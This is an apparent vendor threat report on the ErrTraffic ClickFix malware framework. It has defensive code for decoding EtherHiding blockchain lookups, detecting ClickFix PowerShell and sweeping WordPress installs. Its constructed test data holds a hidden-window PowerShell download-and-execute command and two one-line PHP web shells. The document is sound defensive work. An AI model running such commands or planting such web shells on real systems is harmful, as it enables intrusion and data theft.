ErrTraffic: Inside a Growing ClickFix Malware Distribution Framework
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
ErrTraffic is a malicious JavaScript framework offered through a malware-as-a-service model. It is mainly injected into compromised WordPress websites to deliver ClickFix-style social engineering pages and follow-on malware payloads. The framework also uses the EtherHiding technique to discover command-and-control infrastructure through blockchain smart contracts: the injected script reads its next-stage address from a contract rather than from a hard-coded domain, so the operator can repoint every infected site with a single on-chain update, and the takedown of any one domain does not break the chain.
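How an EtherHiding lookup looks on the wire, and how a responder decodes the contract's reply, as an added example that is not code from the ErrTraffic framework or from the Sekoia report. The contract address, the four-byte selector, the RPC reply and the loader URL are all constructed placeholders; the request shape is the standard Ethereum JSON-RPC eth_call, and the decoder follows the ABI encoding of a single dynamic string return value.

```python
import json

# Hypothetical contract address and 4-byte function selector (the first four
# bytes of keccak256 of the view function's signature). Both are placeholders
# for this illustration, not values tied to ErrTraffic.
CONTRACT = "0x" + "ab" * 20
SELECTOR = "0x20965255"


def build_eth_call(contract: str, selector: str, request_id: int = 1) -> dict:
    """JSON-RPC body an injected script POSTs to a public RPC endpoint.

    eth_call is a free, read-only query: no transaction, no wallet, no fee.
    That is what makes the chain a cheap dead drop, and why defenders must look
    for reads, not on-chain transactions, when hunting for it."""
    return {
        "jsonrpc": "2.0",
        "id": request_id,
        "method": "eth_call",
        "params": [{"to": contract, "data": selector}, "latest"],
    }


def abi_encode_string(value: str) -> str:
    """ABI-encode a single dynamic `string` return value: offset word, length
    word, then the UTF-8 bytes right-padded to a 32-byte boundary."""
    data = value.encode("utf-8")
    padding = (-len(data)) % 32
    return (
        "0x"
        + (32).to_bytes(32, "big").hex()
        + len(data).to_bytes(32, "big").hex()
        + data.hex()
        + "00" * padding
    )


def abi_decode_string(hexdata: str) -> str:
    """Inverse of abi_encode_string, with bounds checks so a truncated or
    malformed capture raises instead of returning garbage."""
    raw = bytes.fromhex(hexdata[2:] if hexdata.startswith("0x") else hexdata)
    if len(raw) < 64:
        raise ValueError("ABI payload too short for a dynamic string")
    offset = int.from_bytes(raw[0:32], "big")
    if offset + 32 > len(raw):
        raise ValueError("string offset points past the payload")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(raw):
        raise ValueError("string length exceeds the payload")
    return raw[start:start + length].decode("utf-8", errors="replace")


def resolve_dead_drop(rpc_response: str) -> str:
    """Turn a captured eth_call response into the string the script would act
    on (a loader URL, a C2 host, or a further-encoded blob)."""
    body = json.loads(rpc_response)
    if "error" in body:
        raise RuntimeError(f"RPC error: {body['error']}")
    return abi_decode_string(body["result"])


# Constructed response, shaped like a browser devtools or proxy capture of the
# reply to build_eth_call(). The URL is a placeholder.
SAMPLE_RESPONSE = json.dumps({
    "jsonrpc": "2.0",
    "id": 1,
    "result": abi_encode_string("https://loader.example.invalid/stage2.js"),
})

if __name__ == "__main__":
    print(json.dumps(build_eth_call(CONTRACT, SELECTOR)))
    print(resolve_dead_drop(SAMPLE_RESPONSE))
```

When hunting for this on a compromised site, capture the POST body and the response from the browser side (the injected script runs in the visitor's browser), then feed the result field to resolve_dead_drop(); looking for wallet or transaction activity finds nothing, because a read leaves no trace on chain.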
Investigation
Sekoia TDR researchers identified two separate activity clusters, referred to as the “Analytics” cluster and the “Beer” cluster. Their investigation revealed several deployment paths, including WordPress PHP backdoors, credential-stuffing attacks for initial access, and malvertising campaigns that impersonated AI platforms. Forensic analysis also showed clear differences in coding style, command usage, and infrastructure patterns between the two clusters.
Mitigation
Organizations should enforce strong credential hygiene and multi-factor authentication on WordPress administrator accounts to blunt the credential-stuffing path to initial access. Keep WordPress core and plugins patched, especially against known flaws such as CVE-2020-25213 (the File Manager plugin remote code execution bug). On endpoints, monitor for PowerShell launched by user action with download-and-execute or obfuscated command lines, which is the pattern a ClickFix lure produces; on the network, monitor for outbound connections to public blockchain RPC services from hosts with no business reason to contact them, and for traffic to uncommon top-level domains.
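Detection logic for the two behaviours this paragraph tells defenders to monitor, run over constructed Sysmon-style telemetry, as an added example that is not part of the original page. Field names follow Sysmon's process-creation and network-connection events; the sample events, the interactive-parent baseline, the RPC endpoint watchlist and the TLD watchlist are assumptions to be tuned to your environment, and the block-comment marker regex is derived from the header quoted in the simulation section of this page.

```python
import json
import re

# --- Constructed Sysmon-style telemetry (not real ErrTraffic logs), one JSON
# object per line. Backslashes are JSON-escaped; the raw string keeps them.
PROCESS_EVENTS = r"""
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -c \"<# Code Verification: 656560395146 #> $k=[convert]::ToInt32('5'); iex (irm https://cdn.example.top/s)\""}
{"ParentImage": "C:\\Program Files\\Agent\\agent.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -NoProfile -File C:\\Scripts\\inventory.ps1"}
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt"}
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "CommandLine": "pwsh -c Get-Date"}
"""
NETWORK_EVENTS = r"""
{"Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "DestinationHostname": "bsc-dataseed.binance.org", "DestinationPort": 443}
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "DestinationHostname": "cdn.example.top", "DestinationPort": 443}
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "DestinationHostname": "www.microsoft.com", "DestinationPort": 443}
{"Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "DestinationHostname": "www.wikipedia.org", "DestinationPort": 443}
"""

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# A user-driven launch (ClickFix asks the victim to paste into the Run dialog or
# a terminal) shows up with one of these parents; scheduled tasks, RMM agents and
# logon scripts do not. Assumed baseline: tune to your fleet.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe"}
# Command-line indicators. The block-comment marker is the one quoted on this
# page; the rest are generic download-and-execute and obfuscation idioms.
CMDLINE_INDICATORS = [
    ("errtraffic_marker", re.compile(r"<#\s*Code Verification:\s*\d+\s*#>", re.I)),
    ("invoke_expression", re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)),
    ("download_cradle", re.compile(r"\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString|DownloadFile)\b", re.I)),
    ("hidden_window", re.compile(r"(?:^|\s)-(?:w|win|windowstyle)\s+hidden\b", re.I)),
    ("encoded_command", re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("xor_decode", re.compile(r"-bxor\b", re.I)),
]
# Illustrative public JSON-RPC endpoints; extend from your own intel. EtherHiding
# lookups come from the victim's browser, so this rule is process-agnostic.
RPC_WATCHLIST = {"bsc-dataseed.binance.org", "mainnet.infura.io", "rpc.ankr.com"}
# Illustrative TLD watchlist for the "uncommon TLD" check; tune to what your users visit.
UNCOMMON_TLDS = {"top", "xyz", "icu", "shop", "click"}


def parse_events(jsonl: str) -> list:
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_clickfix_powershell(events: list) -> list:
    """PowerShell spawned by an interactive parent with at least one indicator."""
    findings = []
    for ev in events:
        if _basename(ev["Image"]) not in POWERSHELL_IMAGES:
            continue
        parent = _basename(ev["ParentImage"])
        hits = [name for name, rx in CMDLINE_INDICATORS if rx.search(ev["CommandLine"])]
        if parent in INTERACTIVE_PARENTS and hits:
            findings.append({"rule": "clickfix_powershell", "parent": parent,
                             "indicators": hits, "command_line": ev["CommandLine"]})
    return findings


def detect_suspicious_egress(events: list) -> list:
    """Any process to a blockchain RPC endpoint; PowerShell to an uncommon TLD."""
    findings = []
    for ev in events:
        host = ev["DestinationHostname"].lower()
        proc = _basename(ev["Image"])
        if host in RPC_WATCHLIST or any(host.endswith("." + h) for h in RPC_WATCHLIST):
            findings.append({"rule": "blockchain_rpc_egress", "process": proc, "host": host})
        elif proc in POWERSHELL_IMAGES and host.rsplit(".", 1)[-1] in UNCOMMON_TLDS:
            findings.append({"rule": "powershell_uncommon_tld", "process": proc, "host": host})
    return findings


def run_detections() -> dict:
    return {"process": detect_clickfix_powershell(parse_events(PROCESS_EVENTS)),
            "network": detect_suspicious_egress(parse_events(NETWORK_EVENTS))}


if __name__ == "__main__":
    for section, hits in run_detections().items():
        for finding in hits:
            print(section, json.dumps(finding))
```

The parent-process condition is what keeps the first rule quiet: the same download cradle launched by an RMM agent or a logon script is not a ClickFix event, and alerting on it would bury the one that is.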
Response
If ErrTraffic indicators are detected, isolate the affected web servers immediately and review every WordPress account for unauthorized administrator access. Conduct a full forensic sweep for hidden must-use (MU) plugins, which load automatically and do not appear in the standard plugin list, and for unauthorized PHP files elsewhere in the install. Revoke potentially exposed credentials and rotate all API keys and administrative secrets, including the authentication keys and salts in wp-config.php so that every existing login cookie is invalidated.
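A filesystem sweep for the persistence artefacts the response steps call out (rogue must-use plugins, PHP dropped into upload or cache directories, suspicious code constructs), added here as an example rather than taken from the original page. The allowlist, the directory tree and every file body are constructed for the demo; the rogue MU-plugin borrows only the file name session-manager.php from the attack-flow diagram, and its contents are invented. Run sweep() against a forensic copy of the install, not against the live server.

```python
import os
import re
import shutil
import tempfile

# Must-use plugins load on every request with no activation step and no entry
# in the normal plugin list, so a rogue file here survives a casual review.
# Assumed allowlist: populate it from your own deployment manifest.
EXPECTED_MU_PLUGINS = {"health-check-disable.php"}
# Paths that should never contain PHP on a hardened install (upload handlers
# and caches are the usual drop zones for web shells).
NO_PHP_DIRS = ("wp-content/uploads", "wp-content/cache")
PHP_EXTENSIONS = (".php", ".phtml", ".php5", ".php7", ".phar")
# Code constructs worth a manual look. Any one can be legitimate; eval plus a
# decoder plus request input in the same file almost never is.
SUSPICIOUS_PHP = [
    ("dynamic_eval", re.compile(r"\beval\s*\(", re.I)),
    ("decoder", re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("command_exec", re.compile(r"\b(?:system|shell_exec|passthru|exec|popen|proc_open)\s*\(", re.I)),
    ("request_input", re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[", re.I)),
]


def sweep(root: str) -> list:
    """Return findings for a WordPress tree rooted at `root`."""
    findings = []
    mu_dir = os.path.join(root, "wp-content", "mu-plugins")
    if os.path.isdir(mu_dir):
        for name in sorted(os.listdir(mu_dir)):
            if name.lower().endswith(PHP_EXTENSIONS) and name not in EXPECTED_MU_PLUGINS:
                findings.append({"rule": "unexpected_mu_plugin",
                                 "path": f"wp-content/mu-plugins/{name}"})
    for dirpath, _, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        for name in sorted(files):
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            rel = name if rel_dir == "." else f"{rel_dir}/{name}"
            if rel.startswith(NO_PHP_DIRS):
                findings.append({"rule": "php_in_no_php_dir", "path": rel})
            with open(os.path.join(dirpath, name), encoding="utf-8", errors="replace") as fh:
                source = fh.read()
            hits = [label for label, rx in SUSPICIOUS_PHP if rx.search(source)]
            if hits:
                findings.append({"rule": "suspicious_php_code", "path": rel, "indicators": hits})
    return findings


def build_demo_site() -> str:
    """Constructed WordPress tree: one allowlisted MU-plugin, one rogue MU-plugin
    carrying the file name from this page's diagram (body invented here), a web
    shell in uploads, and a clean theme file."""
    root = tempfile.mkdtemp(prefix="wp-sweep-demo-")
    files = {
        "wp-content/mu-plugins/health-check-disable.php":
            "<?php add_filter('site_status_tests', '__return_empty_array');\n",
        "wp-content/mu-plugins/session-manager.php":
            "<?php if (isset($_POST['k'])) { eval(base64_decode($_POST['k'])); }\n",
        "wp-content/uploads/2024/wp-stats.php":
            "<?php $c = $_GET['c']; system($c);\n",
        "wp-content/themes/twentytwentyfour/functions.php":
            "<?php add_theme_support('title-tag');\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def run_demo() -> list:
    root = build_demo_site()
    try:
        return sweep(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

The allowlist check is the important one for MU-plugins: a backdoor there needs no suspicious construct to be dangerous, it only needs to exist, so anything not in your manifest is a finding before its code is even read.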
Attack Flow

graph TB
    %% Class definitions
    classDef reconnaissance fill:#f9f,stroke:#333,stroke-width:2px
    classDef execution fill:#ff9,stroke:#333,stroke-width:2px
    classDef persistence fill:#9f9,stroke:#333,stroke-width:2px
    classDef command_control fill:#9cf,stroke:#333,stroke-width:2px
    classDef delivery fill:#f96,stroke:#333,stroke-width:2px

    %% Reconnaissance and initial access
    recon_cred["<b>Technique</b> – <b>T1589.001 Gather Victim Identity Information: Credentials</b><br/>Description: Using stolen administrator credentials to access WordPress sites."]
    class recon_cred reconnaissance
    recon_drive_by["<b>Technique</b> – <b>T1189 Drive-by Compromise</b><br/>Description: Employing malvertising to direct users to websites impersonating AI platforms like ChatGPT."]
    class recon_drive_by reconnaissance

    %% Execution
    exec_clickfix["<b>Technique</b> – <b>T1204.004 User Execution: Malicious Copy and Paste</b><br/>Description: Using the ClickFix technique with fake error messages such as a BSOD or reCAPTCHA to trick users into executing PowerShell commands."]
    class exec_clickfix execution

    %% Persistence and C2
    pers_webshell["<b>Technique</b> – <b>T1505.003 Server Software Component: Web Shell</b><br/>Description: Deploying PHP backdoors such as the session-manager.php MU-plugin or a Responsive Webshell."]
    class pers_webshell persistence
    pers_valid_acc["<b>Technique</b> – <b>T1078 Valid Accounts</b><br/>Description: Maintaining access via the compromised WordPress dashboard using legitimate credentials."]
    class pers_valid_acc persistence
    c2_etherhiding["<b>Technique</b> – <b>EtherHiding</b><br/>Description: Facilitating communication with C2 infrastructure using blockchain smart contracts as a dead drop resolver."]
    class c2_etherhiding command_control

    %% Payload delivery and credential access
    del_ingress["<b>Technique</b> – <b>T1105 Ingress Tool Transfer</b><br/>Description: Using PowerShell to download malicious binaries and extract them with 7z."]
    class del_ingress delivery
    acc_cred_access["<b>Technique</b> – <b>T1539 Steal Web Session Cookie</b><br/>Description: Malware families exfiltrate stolen credentials, web session cookies, and sensitive WooCommerce data."]
    class acc_cred_access delivery
    malware_stealer["<b>Malware</b> – <b>Vidar or Stealc</b><br/>Description: Infostealers used to exfiltrate data to attacker-controlled domains."]
    class malware_stealer delivery

    %% Connection flow
    recon_cred -->|leads_to| exec_clickfix
    recon_drive_by -->|leads_to| exec_clickfix
    exec_clickfix -->|triggers| pers_webshell
    exec_clickfix -->|triggers| pers_valid_acc
    pers_webshell -->|facilitates| c2_etherhiding
    pers_valid_acc -->|facilitates| c2_etherhiding
    c2_etherhiding -->|commands| del_ingress
    del_ingress -->|deploys| malware_stealer
    malware_stealer -->|performs| acc_cred_access
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
- Attack Narrative & Commands: An attacker has tricked a user into clicking a "Fix" button on a malicious website. The pasted command launches PowerShell to download and decrypt a payload. To evade simple string-based detection, the payload bytes are XOR-encrypted and decrypted at run time. The script opens with the block comment <# Code Verification: 656560395146 #>; PowerShell ignores it at execution, and it serves as a marker for the framework (the source suggests it may also satisfy internal checks in the delivery chain). The script uses [convert]::ToInt32 to parse the XOR key and the -bxor operator to decrypt each payload byte.
- Regression Test Script:

    # Simulation of the ErrTraffic ClickFix PowerShell payload decryption routine.
    # Benign by design: the "payload" is four constructed bytes; nothing is downloaded or executed.
    $header = "<# Code Verification: 656560395146 #>"   # framework marker quoted in the narrative above
    $encodedPayload = @(10, 20, 30, 40)                  # constructed XOR-encrypted bytes
    $key = [convert]::ToInt32("5")                       # XOR key parsed from a string, as in the real payload
    Write-Host "Initializing payload decryption..."
    $decrypted = foreach ($byte in $encodedPayload) { $byte -bxor $key }
    Write-Host ("Decrypted bytes: " + ($decrypted -join ", "))
    Write-Host "Decryption complete."

- Cleanup Commands:

    # The simulation makes no persistent changes; clearing the console is enough.
    Clear-Host